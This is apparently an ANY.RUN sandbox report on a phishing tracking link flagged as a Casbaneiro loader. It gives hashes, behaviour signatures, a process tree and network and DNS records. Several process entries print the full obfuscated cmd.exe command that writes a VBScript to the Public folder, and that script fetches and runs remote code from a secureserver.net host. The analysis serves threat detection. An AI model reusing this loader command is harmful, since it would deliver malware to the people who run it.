URL:

https://et.datacrush.la/track/click?portalID=5780&url=https%3A%2F%2F46.21.205.92.host.secureserver.net%2F&key=NTc4MC00MDg3NzM2MS0tNDEyMzMtMTc5OTIxNzkt&contact_key=87406de0-45f6-48b9-b0fa-4dcc5e3d8fb1&test=1?pedido_id=255885

Full analysis: https://app.any.run/tasks/2c71cb4f-3ed7-41fa-809d-4228c30ed6b5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 15, 2025, 15:21:54
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
casbaneiro
loader
Indicators:
MD5:

405B6E26A07066AB2E4CBAABC67B446B

SHA1:

D55F871969DFCF071FD787AD3B781014D8D32420

SHA256:

0718BE2B6FF64925B82AD0CC577DD785D43502A365D1462A7B4327E2F1EC9870

SSDEEP:

6:2M1ycJMTRQVR3zIqnWtHGQcXCk5DEGKiV/DRlzQzqckZES:2yOQDEXpkFKiV/DRlz8t2p

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • CASBANEIRO has been detected

      • cmd.exe (PID: 6192)
      • cmd.exe (PID: 1764)
      • cmd.exe (PID: 1748)
      • cmd.exe (PID: 4380)
      • cmd.exe (PID: 4172)
      • cmd.exe (PID: 6676)

    • Accesses name of a computer manufacturer via WMI (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Accesses BIOS(Win32_BIOS, may evade sandboxes) via WMI (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Gets script object from HTTP/HTTPS (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

  • SUSPICIOUS

    • Likely accesses (executes) a file from the Public directory

      • wscript.exe (PID: 1852)
      • cmd.exe (PID: 6192)
      • cmd.exe (PID: 1764)
      • cmd.exe (PID: 2108)
      • cmd.exe (PID: 3156)
      • cmd.exe (PID: 1748)
      • cmd.exe (PID: 4380)
      • cmd.exe (PID: 8100)
      • cmd.exe (PID: 7852)
      • wscript.exe (PID: 7880)
      • cmd.exe (PID: 4172)
      • cmd.exe (PID: 8036)
      • cmd.exe (PID: 7752)
      • wscript.exe (PID: 7464)
      • cmd.exe (PID: 6676)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 4488)
      • cmd.exe (PID: 6192)
      • cmd.exe (PID: 2108)
      • cmd.exe (PID: 1764)
      • mshta.exe (PID: 7800)
      • cmd.exe (PID: 1748)
      • cmd.exe (PID: 4380)
      • cmd.exe (PID: 8100)
      • mshta.exe (PID: 1812)
      • cmd.exe (PID: 8036)
      • cmd.exe (PID: 6676)
      • cmd.exe (PID: 4172)

    • Application launched itself

      • cmd.exe (PID: 6192)
      • cmd.exe (PID: 1764)
      • cmd.exe (PID: 2108)
      • cmd.exe (PID: 1748)
      • cmd.exe (PID: 4380)
      • cmd.exe (PID: 8100)
      • cmd.exe (PID: 6676)
      • cmd.exe (PID: 4172)
      • cmd.exe (PID: 8036)

    • Accesses language version of the operating system installed via WMI (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • The process executes VB scripts

      • cmd.exe (PID: 3156)
      • cmd.exe (PID: 7852)
      • cmd.exe (PID: 7752)

    • Accesses OperatingSystem(Win32_OperatingSystem) via WMI (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Accesses computer name via WMI (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Executes WMI query (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Accesses ComputerSystem(Win32_ComputerSystem) via WMI (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Access Product Name via WMI (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Accesses domain name via WMI (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Gets computer name (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Accesses WMI object caption (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Accesses operating system name via WMI (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 1852)
      • wscript.exe (PID: 7880)
      • wscript.exe (PID: 7464)

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 5892)

  • INFO

    • Application launched itself

      • msedge.exe (PID: 5112)
      • Acrobat.exe (PID: 5720)
      • AcroCEF.exe (PID: 1096)

    • Reads Environment values

      • identity_helper.exe (PID: 8188)

    • Reads the computer name

      • identity_helper.exe (PID: 8188)

    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 5892)
      • OpenWith.exe (PID: 4172)

    • Checks proxy server information

      • mshta.exe (PID: 4488)
      • wscript.exe (PID: 1852)
      • mshta.exe (PID: 7800)
      • wscript.exe (PID: 7880)
      • mshta.exe (PID: 1812)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 4488)
      • mshta.exe (PID: 7800)

    • Reads security settings of Internet Explorer

      • OpenWith.exe (PID: 4172)

    • Checks supported languages

      • identity_helper.exe (PID: 8188)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
209
Monitored processes
79
Malicious processes
20
Suspicious processes
2

Behavior graph

Click at the process to see the details
start iexplore.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs sppextcomobj.exe no specs slui.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs winrar.exe no specs mshta.exe no specs #CASBANEIRO cmd.exe no specs conhost.exe no specs cmd.exe no specs #CASBANEIRO cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wscript.exe openwith.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs acrobat.exe no specs acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs mshta.exe no specs #CASBANEIRO cmd.exe no specs conhost.exe no specs cmd.exe no specs #CASBANEIRO cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wscript.exe mshta.exe no specs #CASBANEIRO cmd.exe no specs conhost.exe no specs cmd.exe no specs #CASBANEIRO cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wscript.exe msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
644C:\WINDOWS\system32\cmd.exe /S /D /c" echo"C:\Windows\SysWOW64\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
680\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1072"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7040 --field-trial-handle=2380,i,131962070109055613,17716640847351002509,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1096"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16514043C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcrobat.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1748"C:\Windows\System32\cmd.exe" /k echo|set /p=^"CwgUSVRZGxs=".":bdfuRZUzmxgWukka="i":TGhuZKNvkTrB=":":ibELyJqjeckUN="g":GetO">C:\Users\Public\QkdqQqaleqauxckBbL.vbs&echo|set /p=^"bject("scr"+bdfuRZUzmxgWukka+"pt"+TGhuZKNvkTrB+"hT"+"Tps"+TGhuZKNvkTrB+"//102"+CwgUSVRZGxs+"57"+CwgUSVRZGxs+"205"+CwgUSVRZGxs+"92"+CwgUSVRZGxs+"host"+CwgUSVRZGxs+"secureserver"+CwgUSVRZGxs+"net//"+ibELyJqjeckUN+"1")">>C:\Users\Public\QkdqQqaleqauxckBbL.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\QkdqQqaleqauxckBbL.vbsC:\Windows\SysWOW64\cmd.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
1764"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6020 --field-trial-handle=2380,i,131962070109055613,17716640847351002509,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1764"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7288 --field-trial-handle=2380,i,131962070109055613,17716640847351002509,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1764C:\WINDOWS\system32\cmd.exe /S /D /c" set /p="CwgUSVRZGxs=".":bdfuRZUzmxgWukka="i":TGhuZKNvkTrB=":":ibELyJqjeckUN="g":GetO">C:\Users\Public\QkdqQqaleqauxckBbL.vbs&echo|set /p=^"bject("scr"+bdfuRZUzmxgWukka+"pt"+TGhuZKNvkTrB+"hT"+"Tps"+TGhuZKNvkTrB+"//102"+CwgUSVRZGxs+"57"+CwgUSVRZGxs+"205"+CwgUSVRZGxs+"92"+CwgUSVRZGxs+"host"+CwgUSVRZGxs+"secureserver"+CwgUSVRZGxs+"net//"+ibELyJqjeckUN+"1")">>C:\Users\Public\QkdqQqaleqauxckBbL.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\QkdqQqaleqauxckBbL.vbs"C:\Windows\SysWOW64\cmd.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
1764"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2144 --field-trial-handle=1636,i,7072099081787625110,17211655476910612838,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1812"C:\Windows\SysWOW64\mshta.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa5892.38179\Setup-15052025152202.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\SysWOW64\mshta.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
Total events
28 353
Read events
28 091
Write events
247
Delete events
15

Modification events

(PID) Process:(5112) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\262874
Operation:writeName:WindowTabManagerFileMappingId
Value:
{FA81A4EB-DECA-4C55-842C-1470734E0B77}
(PID) Process:(5112) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\262874
Operation:writeName:WindowTabManagerFileMappingId
Value:
{8A604632-1CC6-4D3A-B8A8-80E6F0CB58E6}
(PID) Process:(5668) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:L1WatermarkLowPart
Value:
0
(PID) Process:(5668) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:L1WatermarkHighPart
Value:
0
(PID) Process:(5668) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:NextCheckForUpdateLowDateTime
Value:
0
(PID) Process:(5668) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:NextCheckForUpdateHighDateTime
Value:
0
(PID) Process:(5668) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:NextCheckForUpdateLowDateTime
Value:
744082572
(PID) Process:(5668) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\UrlBlock
Operation:writeName:NextCheckForUpdateHighDateTime
Value:
31180205
(PID) Process:(5668) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5668) iexplore.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
Executable files
6
Suspicious files
260
Text files
56
Unknown types
0

Dropped files

PID
Process
Filename
Type
5112msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF10bc1e.TMP
MD5:
SHA256:
5112msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
5112msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF10bc2e.TMP
MD5:
SHA256:
5112msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
5112msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF10bc4d.TMP
MD5:
SHA256:
5112msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
5112msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF10bc4d.TMP
MD5:
SHA256:
5112msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
5112msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF10bc4d.TMP
MD5:
SHA256:
5112msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
47
DNS requests
48
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
2.20.245.137:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1852
wscript.exe
GET
200
23.209.209.135:80
http://x1.c.lencr.org/
unknown
whitelisted
1852
wscript.exe
GET
200
2.16.168.113:80
http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgXTpRNyPUo0IRfkZ4xJHFaaRQ%3D%3D
unknown
whitelisted
3900
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
3900
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5496
MoUsoCoreWorker.exe
2.20.245.137:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5496
MoUsoCoreWorker.exe
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
7284
msedge.exe
13.107.42.16:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5112
msedge.exe
239.255.255.250:1900
whitelisted
7284
msedge.exe
150.171.27.11:443
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7284
msedge.exe
13.107.246.45:443
edge-mobile-static.azureedge.net
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7284
msedge.exe
54.39.100.155:443
et.datacrush.la
OVH SAS
CA
unknown
7284
msedge.exe
13.107.6.158:443
business.bing.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.20.245.137
  • 2.20.245.139
whitelisted
www.microsoft.com
  • 23.52.120.96
whitelisted
et.datacrush.la
  • 54.39.100.155
unknown
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 150.171.27.11
  • 150.171.28.11
whitelisted
edge-mobile-static.azureedge.net
  • 13.107.246.45
whitelisted
business.bing.com
  • 13.107.6.158
whitelisted
46.21.205.92.host.secureserver.net
  • 92.205.21.46
whitelisted
www.bing.com
  • 2.16.241.218
  • 2.16.241.222
  • 2.16.241.216
  • 2.16.241.205
  • 2.16.241.201
whitelisted
xpaywalletcdn.azureedge.net
  • 40.90.65.154
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://et.datacrush.la/track/click?portalID=5780&url=https%3A%2F%2F46.21.205.92.host.secureserver.net%2F&key=NTc4MC00MDg3NzM2MS0tNDEyMzMtMTc5OTIxNzkt&contact_key=87406de0-45f6-48b9-b0fa-4dcc5e3d8fb1&test=1?pedido_id=255885